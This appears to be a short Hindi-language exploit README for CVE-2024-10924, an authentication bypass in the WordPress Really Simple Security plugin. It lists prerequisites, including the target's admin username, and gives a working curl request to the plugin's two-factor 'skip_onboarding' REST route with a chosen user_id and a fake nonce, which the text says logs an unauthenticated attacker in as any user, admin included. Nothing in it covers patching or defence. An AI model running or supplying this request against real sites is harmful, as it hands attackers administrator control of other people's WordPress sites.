
CVE-2024-10924 के लिए शोषण, WordPress Really Simple Security प्लगइन (संस्करण 9.0.0-9.1.1.1) में एक गंभीर प्रमाणीकरण बाईपास। दो-कारक प्रमाणीकरण API में एक दोष के माध्यम से अप्रमाणित हमलावरों को किसी भी उपयोगकर्ता के रूप में लॉग इन करने की अनुमति देता है।
CVE-2024-10924, WordPress के लिए Really Simple Security प्लगइन (संस्करण 9.0.0 से 9.1.1.1) में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है। यह भेद्यता अप्रमाणित हमलावरों को टू-फैक्टर ऑथेंटिकेशन (2FA) API में खामी का फायदा उठाकर किसी भी उपयोगकर्ता (एडमिन सहित) के रूप में लॉग इन करने की अनुमति देती है।
Really Simple Security प्लगइन का एक कमजोर संस्करण चलाने वाली WordPress साइट। परीक्षण के लिए Python 3.x या cURL स्थापित हो। लक्ष्य WordPress व्यवस्थापक उपयोगकर्ता नाम (उपयोगकर्ता गणना आवश्यक हो सकती है)।
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v